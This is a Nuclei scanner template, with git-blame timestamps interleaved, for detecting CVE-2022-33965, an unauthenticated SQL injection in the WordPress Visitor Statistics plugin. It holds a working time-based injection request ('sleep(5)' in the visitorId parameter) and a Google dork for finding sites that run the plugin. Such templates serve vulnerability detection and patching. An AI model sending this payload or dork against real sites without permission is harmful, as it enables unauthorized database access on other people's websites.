2022-10-10 06:07:38 +00:00
id : CVE-2022-33965
info :
2022-12-13 20:36:48 +00:00
name : WordPress Visitor Statistics <=5.7 - SQL Injection
2022-10-10 06:07:38 +00:00
author : theamanrawat
severity : critical
description : |
2022-12-13 20:36:48 +00:00
WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-10 06:07:38 +00:00
reference :
- https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities
- https://wordpress.org/plugins/wp-stats-manager/
2022-10-11 07:37:41 +00:00
- https://wordpress.org/plugins/wp-stats-manager/#developers
2022-12-13 20:36:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-33965
2022-10-10 06:07:38 +00:00
classification :
2022-10-11 07:37:41 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-10-10 06:07:38 +00:00
cve-id : CVE-2022-33965
2022-10-11 07:37:41 +00:00
cwe-id : CWE-89
2023-07-11 19:49:27 +00:00
epss-score : 0.01053
cpe : cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
2022-10-10 06:07:38 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-01-24 10:10:04 +00:00
google-query : inurl:"/wp-content/plugins/wp-stats-manager"
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : plugins-market
product : wp_visitor_statistics
2022-10-10 10:24:57 +00:00
tags : cve,cve2022,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager
2022-10-10 06:07:38 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-10 06:07:38 +00:00
- raw :
- |
@timeout : 15s
GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : dsl
dsl :
- 'duration>=5'
2022-10-11 07:13:20 +00:00
- type : regex
regex :
- "^1331' and sleep\\(5\\) or '$"
2022-10-10 06:07:38 +00:00
- type : status
status :
2022-10-10 10:24:57 +00:00
- 200